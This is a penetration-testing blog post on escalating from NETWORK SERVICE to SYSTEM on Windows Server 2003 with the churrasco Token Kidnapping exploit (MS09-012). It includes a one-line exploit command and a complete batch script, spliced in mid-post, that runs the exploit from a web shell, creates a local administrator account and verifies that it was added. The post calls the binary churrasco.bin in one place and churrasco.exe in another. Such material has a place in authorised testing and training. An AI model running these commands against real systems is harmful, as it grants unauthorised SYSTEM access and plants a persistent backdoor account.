Windows Privilege Escalation via Token Kidnapping

If you have access to a box as NT AUTHORITY\NETWORK SERVICE (for example, you have managed to upload an ASP.NET web shell, which on IIS 6 runs under that account by default), you can easily elevate your privileges to SYSTEM with the Token Kidnapping exploit (churrasco).

I'm against uploading binaries to boxes (but still, it's my favourite part); as far as I know there is no Metasploit module for this, so we have no choice. You can download the exploit here and compile it yourself, or you can use the copy that ships with sqlninja at /usr/share/sqlninja/apps/churrasco.exe. sqlninja uses it to escalate from the SQL Server service account once the sa password has been bruteforced.

After uploading it you can elevate your privileges easily (I tested it on Windows Server 2003). churrasco takes the command to execute as its argument and runs it with the kidnapped SYSTEM token, so entering:

churrasco.bin "net user oscp oscp /add && net localgroup Administrators oscp /add"

creates a local administrator account. Check the result with net localgroup Administrators before relying on it.
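The steps above as one batch script, an added example that is not part of the original post: it checks the current identity, runs churrasco with the account-creation command, and verifies that the account actually landed in Administrators instead of assuming it did. It assumes the exploit was uploaded to %TEMP% as churrasco.exe (adjust EXPLOIT if you renamed it) and wraps the command in cmd /c, since "&&" is cmd syntax and may not be interpreted if churrasco hands the string straight to CreateProcessAsUser; the user name and password are placeholders.

```batch
@echo off
REM Added example (not from the original post). Assumes churrasco.exe was
REM uploaded to %TEMP%; NEWUSER/NEWPASS are placeholder values.
setlocal
set NEWUSER=oscp
set NEWPASS=oscp
set EXPLOIT=%TEMP%\churrasco.exe

echo [*] Running as:
whoami 2>nul

if not exist "%EXPLOIT%" (
    echo [-] %EXPLOIT% not found, upload it first
    exit /b 1
)

REM churrasco executes its argument under the kidnapped SYSTEM token.
REM "cmd /c" is added so the "&&" chaining is handled by cmd rather than
REM passed verbatim to the exploit (assumption: safe with either build).
"%EXPLOIT%" "cmd /c net user %NEWUSER% %NEWPASS% /add && net localgroup Administrators %NEWUSER% /add"

REM Verify instead of trusting the exploit's output: the new account must
REM appear in the local Administrators group.
net localgroup Administrators | findstr /i /c:"%NEWUSER%" >nul
if errorlevel 1 (
    echo [-] %NEWUSER% is not in Administrators, escalation failed
    exit /b 1
)
echo [+] %NEWUSER% added to Administrators
endlocal
```

Run it from the web shell's command execution feature (cmd /c C:\path\to\escalate.bat); if whoami is missing, as on some stripped installs, the rest still runs. Remember that the account persists after the engagement, so delete it (net user oscp /delete) when you are done.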

You can read about this vulnerability on the Microsoft website, in security bulletin MS09-012, which fixed it. The bulletin summarises the affected platforms:

This security update is rated Important for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008.